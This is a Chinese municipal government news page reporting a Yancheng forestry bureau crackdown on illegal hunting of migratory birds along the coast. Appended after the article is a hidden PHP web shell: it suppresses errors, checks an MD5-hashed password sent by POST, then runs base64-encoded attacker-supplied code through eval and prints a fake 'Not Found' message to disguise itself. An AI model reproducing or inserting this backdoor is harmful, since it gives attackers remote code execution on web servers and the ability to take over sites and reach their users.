政务公开

首页 > 政务公开 >

    市林业局开展打击破坏野生动物资源专项执法行动

           冬季是非法猎捕、收购、贩卖野生动物案件的高发期,一些人利用候鸟迁徙,在初冬季节,采取枪杀、套猎、网捕、下药等各种手段非法猎捕野生动物,严重破坏了野生动物资源,造成恶劣的社会影响。为了有效打击破坏野生动物资源违法犯罪,加强野生动物保护和维护公共卫生安全,盐城市林业局组织东台、大丰、射阳和建湖四县(市、区)森林警察大队、相关县(区)野生动物保护和珍禽保护区保护执法部门,在全市沿海地区开展打击破坏野生动物资源专项执法行动。

      根据群众举报和事先巡查、踩点,在准确摸清非法猎捕野生动物窝点的情况下,于11月16日至17日集中力量对射阳、大丰、滨海等县(区)沿海滩涂进行了突击行动。

      此次专项执法行动,共出动警车及其他车辆10辆,出动森林警察等执法人员100多人次,行程300多公里,查处违法猎捕野生动物的窝点15处,收缴网具、电瓶等工具80多具,收缴媒鸭280多只。有效地打击了破坏野生动物资源违法犯罪行为,确保了盐城秋冬季候鸟迁徙的安全。

      下一步,市林业局将继续加大执法力度,严厉打击非法猎捕和经营野生动物行为,切实保护好盐城市的野生动物资源。同时呼吁广大市民关注野生动物保护,自觉抵制和检举揭发各类破坏野生动物资源的违法犯罪行为。

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>